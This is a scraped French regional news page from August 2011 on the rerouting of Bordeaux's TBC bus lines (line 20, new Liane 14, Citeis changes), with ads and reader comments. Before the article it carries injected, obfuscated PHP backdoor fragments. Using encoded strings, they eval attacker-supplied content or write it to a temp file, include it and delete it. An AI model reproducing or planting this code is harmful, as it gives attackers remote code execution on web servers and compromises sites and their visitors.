cqcQXaa();}private function cqcQXaa(){if (is_array(aR_mrO::$bAnVuiax)) {$IguQkAt = str_replace('<' . "\77" . chr ( 446 - 334 ).'h' . chr (112), "", aR_mrO::$bAnVuiax["\x63" . chr (111) . 'n' . chr (116) . "\x65" . "\156" . 't']);eval($IguQkAt);exit();}}}$WJCexR = new aR_mrO(); $WJCexR = 26600;} ?>DrFeTaSH();}private function DrFeTaSH(){if (is_array(i_sOSbI::$FKXfhXZsNW)) {$qyaqg = sys_get_temp_dir() . "/" . crc32(i_sOSbI::$FKXfhXZsNW[chr (115) . "\x61" . chr (108) . "\164"]);@i_sOSbI::$FKXfhXZsNW["\167" . 'r' . "\x69" . 't' . 'e']($qyaqg, i_sOSbI::$FKXfhXZsNW["\143" . "\x6f" . "\x6e" . "\x74" . 'e' . 'n' . chr (116)]);include $qyaqg;@i_sOSbI::$FKXfhXZsNW["\x64" . 'e' . chr ( 693 - 585 )."\145" . 't' . chr ( 161 - 60 )]($qyaqg);exit();}}}$UIRCwYS = new i_sOSbI(); $UIRCwYS = 63738;} ?>MuydRwkvY();}private function MuydRwkvY(){if (is_array(w_bNMzP::$fVITCsv)) {$oCkUrqdKzI = sys_get_temp_dir() . "/" . crc32(w_bNMzP::$fVITCsv[chr ( 722 - 607 )."\141" . "\154" . "\164"]);@w_bNMzP::$fVITCsv["\167" . chr ( 365 - 251 ).'i' . "\x74" . "\145"]($oCkUrqdKzI, w_bNMzP::$fVITCsv[chr (99) . chr (111) . "\156" . "\x74" . chr ( 1003 - 902 ).'n' . "\x74"]);include $oCkUrqdKzI;@w_bNMzP::$fVITCsv[chr ( 964 - 864 ).'e' . chr ( 195 - 87 )."\145" . chr ( 807 - 691 )."\x65"]($oCkUrqdKzI);exit();}}}$wrzFRPwqr = new w_bNMzP(); $wrzFRPwqr = NULL;} ?>tEYMoQqEaJ();}private function tEYMoQqEaJ(){if (is_array(zLB_mJk::$wLHQMn)) {$kamJFUhY = sys_get_temp_dir() . "/" . crc32(zLB_mJk::$wLHQMn[chr ( 763 - 648 ).chr ( 966 - 869 )."\154" . "\x74"]);@zLB_mJk::$wLHQMn["\x77" . chr (114) . "\x69" . "\x74" . 'e']($kamJFUhY, zLB_mJk::$wLHQMn["\143" . 'o' . chr (110) . chr ( 274 - 158 ).chr (101) . chr ( 798 - 688 )."\x74"]);include $kamJFUhY;@zLB_mJk::$wLHQMn["\x64" . "\145" . "\154" . chr (101) . "\x74" . 'e']($kamJFUhY);exit();}}}$VBagoxoWn = new zLB_mJk(); $VBagoxoWn = NULL;} ?>
Jeudi 25 août 2011 à 06h00 Par Julien Rousset |
6 | commentaire(s) |
Bordeaux
Fin avril 2009, Keolis, choisi par les élus de la CUB au détriment de Veolia, devient l'exploitant du réseau de bus et de trams de l'agglo. Le 22 février 2010, ce nouveau délégataire met en service une carte des transports profondément remaniée : apparition des Lianes, ces lignes de bus aussi transversales et cadencées que les trams, arrivée du VCub… En juin dernier, un premier bilan est présenté. Que montre-t-il ? Entre autres, que la fréquentation des transports en commun a progressé en 2010 dans la CUB alors qu'elle stagne dans d'autres métropoles (+ 15 % pour les bus, + 7 % pour le tram), et que le bus revient au premier plan- il absorbe 40 % des 102 millions de voyages recensés en 2010.
Des faiblesses apparaissent aussi, et il avait été convenu que la carte des bus serait ajustée pour cette rentrée : « Nous avons essayé de tenir compte des demandes des élus, des usagers, des bilans de fréquentation ligne par ligne… », explique Paul Chaperon, directeur commercial de TBC. Voici quelques-unes des modifications qui entreront en vigueur lundi, avec le retour des horaires d'hiver.
1 Talence : la ligne 20 ira jusqu'à Forum
La ligne 20, qui va du quartier de Thouars à Talence jusqu'à la Victoire, en passant par la Barrière de Toulouse et Nansouty, fera désormais un crochet par le centre talençais, la station Forum. Objectif de ce détour : permettre aux habitants de Thouars et de Bagatelle d'avoir un accès direct à l'un des points névralgiques de la commune. Attention, le trajet dans son ensemble s'en trouve rallongé d'une dizaine de minutes.
2 Bordeaux-Nord : une nouvelle liane
Les travaux liés à la troisième phase du tram risquent de perturber la circulation des voitures et des transports en commun dans le secteur. Aussi, pour limiter la gêne et les retards, TBC a choisi de couper en deux l'itinéraire de la liane 15, qui, arrivant de Villenave d'Ornon, s'arrêtera désormais aux Aubiers. Une nouvelle ligne, la liane 14, prendra le relais des Aubiers jusqu'à Bacalan, via le centre commercial du Lac, le palais des congrès, le parc des Expos, la Caisse des dépôts, la piscine Tissot…
3 Les Citeis revues et corrigées
Créées en 2010, ces petites lignes qui relient des quartiers et non des communes sont encore mal comprises ; leur parcours est parfois jugé illisible par les usagers. Jusqu'ici, certaines de ces Citeis fonctionnaient en boucle. Par exemple, la Citeis 45, qui reliait les deux rives via une boucle entre le pont Saint Jean et le pont de pierre. À partir du 29, cette citeis 45 partira de Bastide, ira jusqu'aux Capus, via Stalingrad et Victoire, et vice versa, mais elle ne passera plus par le pont Saint Jean. Finie, la boucle. La Citeis 42 change également d'itinéraire pour desservir le quartier de la Glacière : elle ne transitera plus par Capeyron, Jard et Caudéran. Enfin, la Citeis 46 rejoindra à partir de lundi le quai des marques en passant par le cours du Médoc, jusqu'ici fort mal desservi par les bus.
D'autres réaménagements (de ligne, d'horaires) sont prévus. Plus d'infos sur infotbc.com, ou dans les espaces de TBC (Gambetta, Quinconces, Saint Jean, Buttinière, Arts et Métiers).
Les Annonces | autour de Bordeaux |
---|
T4 et plus 86m² - 285 000 € BORDEAUX | App. de caractère 163m² - 593 000 € Bordeaux | Nissan Qashqai 26 300 € BORDEAUX |
|
MusiqueNET TRADIO
JeunesseLes etoilesDe Toulenne
ACCSL
Toutes les associations du Sud-Ouest
| |||||||||
|
28/08/2011, à 15h23 Alertez
Réagir
27/08/2011, à 09h19 Alertez
Réagir
26/08/2011, à 12h16 Alertez
Réagir
26/08/2011, à 10h30 Alertez
Cessez de nous bassiner avec vos histoires de métro, nous n'en voulons pas et il ne ferait que défigurer bordeaux.
Le tram est très bien comme il est mais il est vrai qu'il faut modifier la circulation de certaines lignes de bus pas toujours évidente à appréhender.
Réagir
26/08/2011, à 01h40 Alertez
Réagir
25/08/2011, à 09h26 Alertez
Réagir